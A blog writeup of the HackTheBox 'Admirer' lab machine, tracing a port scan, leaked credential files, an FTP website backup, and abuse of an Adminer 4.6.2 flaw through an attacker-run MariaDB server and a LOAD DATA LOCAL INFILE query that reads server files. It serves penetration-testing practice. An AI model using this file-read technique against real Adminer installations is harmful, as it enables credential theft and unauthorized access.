Featured Post, HTB

HTB Admirer Writeup

by Mathay Kahraman

Introduction

This is my first writeup for a HackTheBox machine. In this writeup, I will explain my thoughts and ideas when examining/attacking the box. In most steps, I will not write down the exact commands which I have used but I will explain how and why I performed these steps.

Nmap

To start, we will run a port scan on the box using Nmap. The result of this port scan is:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

On this box, three ports are open: 21 (FTP), 22 (SSH), and 80 (HTTP). The next step to perform is to test if we are able to login anonymously with FTP or SSH. Trying to login anonymously failed on both services and we continued with the HTTP server. Nmap shows that port 80 has a ‘robots.txt’ file which disallows the entry of the folder ‘/admin-dir’. This will be examined in the next section.

Webserver

Going to ‘http://10.10.10.187’ reveals that the website contains some kind of art pictures. Inspecting the code of the webpage (use F12) reveals that there is a contact form that does not work. However, the Admirer link at the bottom left of the screen links to ‘index.html’. Clicking on it reveals that ‘index.html‘ does not exist. Altering the URL to ‘index.php‘ and we get the same homepage as before. We now know that the webserver is running PHP files. 

During the port scan, we found out that the webserver has a ‘robots.txt‘ file which disallows the entry of the folder ‘/admin-dir‘. First, we went to examine the ‘robots.txt‘ file and found this (comment):

User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

Visible from this comment is that ‘waldo‘ might be a potential username. The other interesting words are that this folder contains personal contacts and creds. 

Next, we went to examine the ‘/admin-dir‘ folder. However, we did not have permission to access this resource. Since this folder contains personal contacts and creds (see previous code block), we tried to manually find these files. We found out by randomly guessing that the contacts are stored in ‘admin-dir/contacts.txt‘ and the credentials are stored in ‘admin-dir/credentials.txt‘. Another way to find these files is by fuzzing. One could use gobuster for example with a wordlist and use the ‘.txt‘ extension to find the files. The ‘contacts.txt‘ file contains:

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

And the ‘credentials.txt‘ file contains:

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

These are all potential usernames and passwords combinations to use. Scanning through these credentials, we found an FTP account. We used the credentials to login to the FTP server of the box and we connected successfully. 

FTP

The FTP server contains two files: ‘dump.sql‘ and ‘html.tar.gz‘. The ‘dump.sql‘ file contains the structure of the table ‘items‘ and reveals that the database name is ‘admirerdb‘ and the used server is ‘MariaDB‘.

The ‘html.tar.gz‘ file contains a backup of the website. It contains two folders which are interesting: ‘utility-scripts‘ and ‘w4ld0s_s3cr3t_d1r‘. The ‘utility-scripts‘ folder contains four PHP files:

  • admin_tasks.php: reveals that this page is using the ‘/opt/script/admin_tasks.sh‘ file to run some commands
  • db_admin.php: reveals new credentials: waldo:Wh3r3_1s_w4ld0?
  • info.php: runs the phpinfo() command
  • phptest.php: runs the echo command to test if PHP is working correctly

The ‘w4ld0s_s3cr3t_d1r‘ folder contains two files: ‘credentials.txt‘ and ‘contacts.txt‘. The ‘contacts.txt‘ file is the same file as on the original web server. However, the ‘credentials.txt‘ file contains one more credential than the original file on the webserver:

[Bank Account]
waldo.11
Ezy]m27}OREc$

We tried to use these new credentials everywhere, but without luck and we continued examining the webserver.

Webserver

The FTP section revealed that there is a ‘utility-scripts‘ folder. We found all the four files as previously explained, except the ‘db_admin.php‘ file. To see what is more in this folder, we ran gobuster using the ‘dirb/big.txt‘ file and the ‘.php‘ extension. We found out that there is an ‘adminer.php‘ file located in the folder. Going to this file reveals that it is a sort of PHPMyAdmin service. The first point we notice is that there is an upgrade notice in the top left corner of the page: 4.6.2 –> 4.7.7. So we know that this service is running on an old version. Googling if there are any known exploit to this service running on version 4.6.2 reveals that there is an vulnerability that lets you reveal the content of the files on the machine which hosts the Adminer service.

To abuse this vulnerability, we created our own MariaDB SQL server, with a user that has all the privileges to access all tables from any host/IP address. We connected using the Adminer service to our SQL server and run this SQL query to retrieve the content of the files and the content is saved into the table:

LOAD DATA LOCAL INFILE '/var/www/html/'
INTO TABLE admirer.test
FIELDS TERMINATED BY "\n"

Trying to identify files outside the ‘var/www/html/‘ folder returns a permission error, so we need to identify which file we need to access to continue the hunt to get access to the user. We tried all the files in the ‘utility-scripts‘ folder and ‘admin-dir’ folder, but without luck. They are the same as before. Then we realized that the ‘index.php‘ is not yet examined by us. So we tried to retrieve the content of the ‘index.php‘ file and it revealed a new credential:

$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

With these credentials, we were able to login to the SSH server and retrieve the user flag.

Conclusion

Admirer should be an ‘easy‘ box, and the techniques used are easy. However, the amount of guessing/puzzling work in this box is quite a struggle. I really enjoyed the part of setting up my own SQL server and therefore abusing the vulnerability in the Adminer service. The next writeup of a HackTheBox machine will be released in a couple of days.

Post Views: 106,916